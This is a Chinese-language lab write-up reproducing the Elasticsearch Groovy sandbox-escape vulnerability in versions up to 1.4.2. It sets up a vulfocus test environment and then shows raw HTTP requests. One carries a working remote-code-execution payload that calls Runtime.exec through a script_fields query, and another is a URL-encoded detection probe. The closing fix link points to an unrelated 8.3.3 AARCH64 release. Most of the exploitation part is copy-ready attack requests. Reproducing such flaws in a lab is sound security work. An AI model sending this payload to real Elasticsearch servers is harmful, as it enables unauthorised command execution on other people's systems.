漏洞名称
漏洞描述
Elasticsearch的Groovy脚本引擎在1.3.8之前和1.4.3之前,允许远程攻击者绕过沙箱保护机制,通过精心编制的脚本执行任意shell命令。
影响版本
Elasticsearch <= 1.3.7
Elasticsearch 1.4.0
Elasticsearch 1.4.1
Elasticsearch 1.4.2
漏洞复现
环境搭建
受害者IP:192.168.63.129:64008
攻击者IP:192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
启动vulfocus
docker-compose up -d
环境启动后,访问http://192.168.63.129:64008即可看到一个ElasticSearch页面,说明已成功启动。
漏洞利用
访问/_search?pretty页面,返回该页面可能存在该漏洞。
访问/website/blog/路径,发送数据包,进行创建数据。
POST /website/blog/ HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
执行任意代码
POST /_search?pretty HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
若进行漏洞探测,而不执行系统命令。响应体会返回一个字符串。
GET /_search?source=%7b%22size%22%3a1%2c%22query%22%3a%7b%22filtered%22%3a%7b%22query%22%3a%7b%22match_all%22%3a%7b%7d%7d%7d%7d%2c%22script_fields%22%3a%7b%22rikjbonmrfwqhxgpztcejleciqvgzb%22%3a%7b%22script%22%3a%22import+java.util.*%3b%5cnimport+java.io.*%3b%5cna%3d%5c%221%5c%22%3b%5cnif(a%3d%3d%5c%221%5c%22)%5cnreturn+%5c%22buxnjqnpgxclouohrsycttygdrdqpm%5c%22%2b%5c%22asxtjvqyonzndxfvlbgjqwmgtudlpy%5c%22%3b%22%7d%7d%7d&callback=jQuery111106033293346081683_1400563833509&_=1400563833510 HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
修复建议
1.适用于Elasticsearch—LINUX AARCH64的安全更新
https://www.elastic.co/cn/downloads/past-releases/elasticsearch-8-3-3